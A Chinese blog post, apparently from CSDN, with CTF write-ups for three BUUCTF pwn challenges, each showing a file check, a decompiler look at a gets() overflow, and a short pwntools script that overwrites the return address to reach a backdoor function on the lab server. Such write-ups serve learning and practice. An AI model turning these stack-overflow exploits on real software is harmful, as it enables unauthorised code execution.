解题1-5

最新推荐文章于 2024-08-14 18:10:44 发布
最新推荐文章于 2024-08-14 18:10:44 发布
阅读量119 收藏
点赞数 1
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NUC_zlt/article/details/130024898
版权

文章目录

RIP

  • 文件检查:

64位文件,没有开启保护

在这里插入图片描述

  • 代码分析:

在这里插入图片描述

存在gets函数,存在溢出条件,找到后门函数地址即可

在这里插入图片描述

  • exp如下:
from pwn import *

io = remote('node4.buuoj.cn',27715)

b = 15+8

payload = b'a'*b + p64(0x401187)

io.sendline(payload)

io.interactive()
  • 得到flag

在这里插入图片描述

warmup_csaw_2016

  • 先把文件放入虚拟机

在这里插入图片描述

没有开启保护并且为64位文件

  • 放入ida中

在这里插入图片描述

代码分析:两个write函数输出,利用sprintf函数将sub_40060函数的地址打印出来放到s,在最后一行发现gets函数,存在溢出条件。查看是否有后门函数,

在这里插入图片描述

发现了cat flag,只要返回到0x40060D,即可得到flag。

在这里插入图片描述

偏移量ida已经给出一部分,略加计算可偏移量为0x40+8

exp如下:

from pwn import *

io = remote('node4.buuoj.cn',27766)

b = 0x40+8

payload = b'a'*b + p64(0x40060D)

io.sendline(payload)

io.interactive()

得到flag
在这里插入图片描述

ciscn_2019_n_1

  • 文件检查:
    在这里插入图片描述

发现是64位文件,且只开启了NX保护

  • 代码分析:

在这里插入图片描述

主函数中调用了func函数,进取看看

在这里插入图片描述

第九行发现gets函数,且有system函数,找到cat flag的地址就可以直接栈溢出到返回地址。

  • exp如下:
from pwn import *

io = remote('node4.buuoj.cn',29229)

c = 0x30+8

payload = b'a' * c + p64(0x4006BE)

io.sendline(payload)

io.interactive()
  • 得到FLAG

在这里插入图片描述

D0vee
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf解题--后台登录(web)
qq_36791003的博客
08-16 1万+
题目 格式:flag:{xxx} 解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 打开连接 查看源码 通过post方式给password变量传值 md5加密后拼接sql查询语句到后台执行 后面的判断就是要求sql语句要成功执行 MD5函数 参考链接:http://www.w3school.com.cn/ph...
Python-手机网上答题系统
08-10
5. 数据验证与安全:确保用户输入的安全性,防止SQL注入等攻击。 6. 错误处理和日志记录:确保程序出错时能够有效记录和调试。 7. 版本控制:如Git,用于团队协作和代码版本管理。 虽然系统没有后台管理界面,但...
软件设计师-软考中级-下午题答题笔记-答题技巧-解题方式-下午题内容学习
Single_minde的博客
10-20 4371
软件设计师-软考中级-下午题答题笔记-答题技巧-解题方式-下午题内容学习。主要针对下午题做的一个学习笔记,从每个题的出题情况进行总结,归纳出答题技巧,并给出了学习方向,在复习下午题时能更快更轻松的解决,并拿到应该拿到的分数。
BUUCTF Basic 解题记录--BUU SQL COURSE 1
weixin_43171033的博客
09-14 1981
BUUCTF Basic 解题记录--BUU SQL COURSE 1
CTF初学笔记解题-密码1
ilqgffvramusm2864的博客
03-28 3735
我的CTF解题:萌新_密码1
ctfshow-Web 解题记录1
weicanh的博客
04-19 4613
ctfshow-Web 解题记录1
CTF解题-web类
qq_42936836的博客
08-24 5650
记录的一些CTFweb题目~~~
隐枚举法求解0-1整数规划
热门推荐
wulimmya的博客
09-09 1万+
隐枚举法就是在 枚举过程中引入过滤条件。 0-1整数规划是整数规划的特殊情形,部分或全部变量只能取0或者1, 这个约束表示为 0≤xj≤1,xj∈N,j=1,2,⋯n0\leq x_j\leq1, x_j \in N, j=1,2,\cdots n0≤xj​≤1,xj​∈N,j=1,2,⋯n 或者表示为 xj(1−xj)=0,j=1,2,⋯nx_j(1-x_j)=0, j=1,2,\cdots ...
解题-->在线OJ(十二)
weixin_51062428的博客
04-27 2146
解题-->力扣1.子集2.单词搜索3.不同的二叉搜索树4.验证二叉搜索树 1.子集 解题: class Solution { List<List<Integer>> result=new ArrayList<>(); List<Integer> list=new ArrayList<>(); public List<List<Integer>> subsets(int[] nums)
L1-012 计算指数 (5 分) 含解题思路 C语言
qq_55648018的博客
03-06 1841
L1-012 计算指数 (5 分) 含解题思路 C语言
CTF MISC解题思路BUUCTF MISC1-8刷题
风儿轻轻吹
05-21 3629
CTF MISC解题思路BUUCTF MISC1-8解题思路
考研答题卡-数.pdf
07-17
卷面的整洁非常重要,有可能会因为你回答的比较整洁就多给1分,如果卷面比较混乱,阅卷老师找不到你的要点就很可能会直接给低分。 提前了解考研答题卡模板,可以让你考研考场上不慌张,希望能帮助到大家,也祝愿大家...
知乎答题助手-crx插件
04-03
1、问题评分。对搜索结果页和等你来答中的问题进行评分,并以鲜明的颜色标注,帮你快速分辨。2、问题图表。在问题详情页中可以一目了然地看到该问题下所有回答的相关情况,犀利洞察,快人一步。3、更多功能,不便多...
Python-冲顶大会答题辅助工具
08-10
【Python-冲顶大会答题辅助工具】是一种利用Python编程语言开发的应用程序,旨在帮助用户在参与《冲顶大会》等在线答题活动时提高答题效率和正确率。这种辅助工具通常结合了网络爬虫、自然语言处理和数据分析等功能...
Bravo-1.pcapng
02-20
职业院校技能大赛(中职组)网络安全-数据分析数据包
VTK-vtkStructuredGrid学习
weixin_69505365的博客
08-14 384
可以理解为单元格顺序沿着坐标轴排列,但是每个单元格可以不一样。维度理解为X/Y/Z方向的点数,如草图所示分别是4,3,1。此时只提供了12个点,只能构造一层,5.点图、线图、面图如下,对应行的代码改一下出现不同效果图。7.增加Z方向维度,点也要增加,点序保持一致。6.点可以不在同一个平面,随机改变点Z数值。2.获取这些点信息,点顺序要严格按照图示。直接赋值第一层的12个点,改一下Z值。所以Z方向维度是1,不能是其他数据。1.使用CAD随意绘制个网格草图。4.将上面的网格显示出来。
fme处理空间数据入门v0
weixin_43229258的博客
08-13 757
本教程是最最最基本的fme处理空间数据内容,给新同事介绍我以前是怎么干活用的,基本啥有用的东西。本教程主要说如何在 FME Workbench中创建模板文件(一般我们把fme写的工作空间就叫模板),教程里面主要是利用GIS数据。按照分步说明操作,1.了解如何从读取数据;2.添加转换器以在空间上过滤数据;3.将过滤后的数据写入 Esri Shapefile;4.如何运行模板文件。
8月13日学习笔记 LVS
weixin_70751701的博客
08-13 1154
目标地址散列调度算法先根据请求的目标IP地址,作为散列键 (Hash Key)从静态分配的散列表找出对应的服务器,若该服务器 是可用的且未超载,将请求发送到该服务器,否则返回空。1. 配置两个网卡和两个ip地址,正常来说应该配置两个不同的网段的 ip,一个对外的vip,一个对内的dip,现在主要使用nat的网络模 式,可以配置桥接模式对外,Nat对内,教师机不方便配置桥接模 式,所以都是配置的nat模式,但是一定要分清楚哪个ip是vip,哪个 ip是dip,在物理主机上都要能够ping通。
【OCR 学习笔记】二值化——全局阈值方法
最新发布
TeamLee的博客
08-14 818
该文介绍了图像二值化操作中的全局阈值方法,包括固定阈值方法和Otsu算法(最大类间方差法)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值